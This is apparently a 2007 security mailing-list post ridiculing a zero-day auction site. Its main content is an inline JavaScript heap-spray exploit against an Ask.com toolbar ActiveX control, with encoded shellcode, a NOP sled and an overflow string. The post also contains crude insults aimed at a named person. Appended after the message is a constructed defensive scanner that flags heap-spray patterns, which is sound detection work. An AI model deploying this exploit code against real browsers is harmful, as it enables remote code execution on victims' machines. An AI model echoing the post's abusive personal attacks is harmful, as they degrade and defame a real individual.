--Hush_boundary-46f7e9fe5bdc4
Content-type: text/plain; charset="UTF-8"
Dear Security List Moderator,
Proving itself to be the true iDefense of the New Millennium (TM),
WabiSabiLabia has released a new worthless bug and exploit to their
auction area [1]. Attached is an exploit for the bug, which is
described by WabiSabiLabia at the end of this electronic
correspondence. It is included inline as well as an attachment.
STOP WABISABILABIA EXPLOITATION OF DISEASED HACKER OVERACHIEVERS!
KILL ALL WABISABILABIA BUGS BEFORE SALE!
YOU TOO CAN PREVENT FOREST FIRES! [2]
J
[1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
[2] Gadi Evron is a fat fuck who invented DNS
___ BEGIN ___
<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times
because what else?
// This code currently not work on
Solaris/Sparc
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%
u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%
u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%
u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%
u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%
uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length * 2;
var spraySlideSize = dick - (j0hnson+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (str0ke - 0x400000)/dick;
memory = new Array();for (i=0;i<heapBlocks;i++)
{memory[i] = spraySlide + sucks;}
try{
gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );
}
catch(evron)
{
alert(evron);
}
netdev = "A";
while (netdev.length != 0x5e0)
netdev += "A";
netdev += unescape("%0d%0d%0d%0d");
gadi.ShortFormat = netdev;
function getSpraySlide(spraySlide, spraySlideSize)
{while (spraySlide.length*2<spraySlideSize){
spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;}
</script>
</html>
___ END ___
On Mon, 24 Sep 2007 06:06:39 -0400 webmaster@wslabi.com wrote:
>NEW ZERODAY PUBLISHED
> A new zeroday has been published with Wabisabilabi code
>ZD-00000148
> THIS ITEM IS SOLD UNDER THIS SCHEME: AUCTION
>
> Title: ask.com toolbar remote vulnerability
> Time to live: 14 days, 20 hours, 52 minutes
> Vulnerability type: client side
> Affected system: Windows XP
> Remote: true
> Local: false
> PoC: true
> Public description: ask.com toolbar suffers from a remote vulnerability.
>Affected version is 4.0.2.53. PoC is included. Further information
>for registered bidders only.
--Hush_boundary-46f7e9fe5bdc4
Content-type: text/plain; name="ZD-00000148.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ZD-00000148.txt"
--Hush_boundary-46f7e9fe5bdc4--
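
Added example, not part of the original message: a static scanner that a mail or web gateway could run over script text to flag the heap-fill pattern seen in the inline PoC above (repeated %u sled seed, string doubling loop, array fill, sprayed-address literal, ActiveX instantiation). The rule names, the thresholds and the SAMPLE/BENIGN inputs are constructed for illustration; SAMPLE carries filler data, not the posted payload.

```javascript
// Added example: static heuristics for heap-spray script (all names hypothetical).
const RULES = [
  // Sled seed: the same %uXXXX unit repeated inside a single unescape() literal.
  { id: "sled-seed", re: /unescape\s*\(\s*["'](%u[0-9a-f]{4})\1+["']/i },
  // A string appended to itself inside a length-bounded loop (exponential growth).
  { id: "doubling-loop", re: /while\s*\([^)]*\.length[^)]*\)\s*\{?\s*(\w+)\s*\+=\s*\1\b/ },
  // Array slots filled in a loop with the concatenation of two strings.
  { id: "array-fill", re: /for\s*\([^)]*\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+/ },
  // Numeric literal shaped like a commonly sprayed address (0x0a0a0a0a..0x0d0d0d0d).
  { id: "spray-address", re: /0x(0[a-d])\1{3}\b/i },
];

function scanForHeapSpray(source) {
  const hits = RULES.filter((r) => r.re.test(source)).map((r) => r.id);
  // Count %u escapes across the whole script, so a blob split over several
  // concatenated literals is still counted. Threshold of 32 is an assumption.
  const escapes = (source.match(/%u[0-9a-f]{4}/gi) || []).length;
  if (escapes >= 32) hits.push("encoded-blob");
  // Record which control is instantiated; that is what to inventory or block.
  const m = /new\s+ActiveXObject\s*\(\s*['"]([^'"]+)['"]/.exec(source);
  const progId = m ? m[1] : null;
  // Flag only when several spray indicators coincide with an ActiveX load.
  return { hits, progId, suspicious: hits.length >= 3 && progId !== null };
}

// Constructed input with the same structure as the PoC, filler bytes only.
const SAMPLE = [
  "var target = 0x0d0d0d0d;",
  'var blob = unescape("' + "%u4141".repeat(40) + '");',
  'var sled = unescape("%u9090%u9090");',
  "while (sled.length*2 < 0x400000) { sled += sled; }",
  "var mem = []; for (i = 0; i < 200; i++) { mem[i] = sled + blob; }",
  "var ctl = new ActiveXObject('AskJeevesToolBar.SettingsPlugin.1');",
].join("\n");

// Constructed benign input: legitimate ActiveX use and a single %u escape.
const BENIGN =
  "var x = new ActiveXObject('Microsoft.XMLHTTP'); var s = unescape('%u00e9');";

console.log(scanForHeapSpray(SAMPLE));
console.log(scanForHeapSpray(BENIGN));
```

Requiring several indicators together keeps pages that merely use unescape() or a legitimate ActiveX object from being flagged.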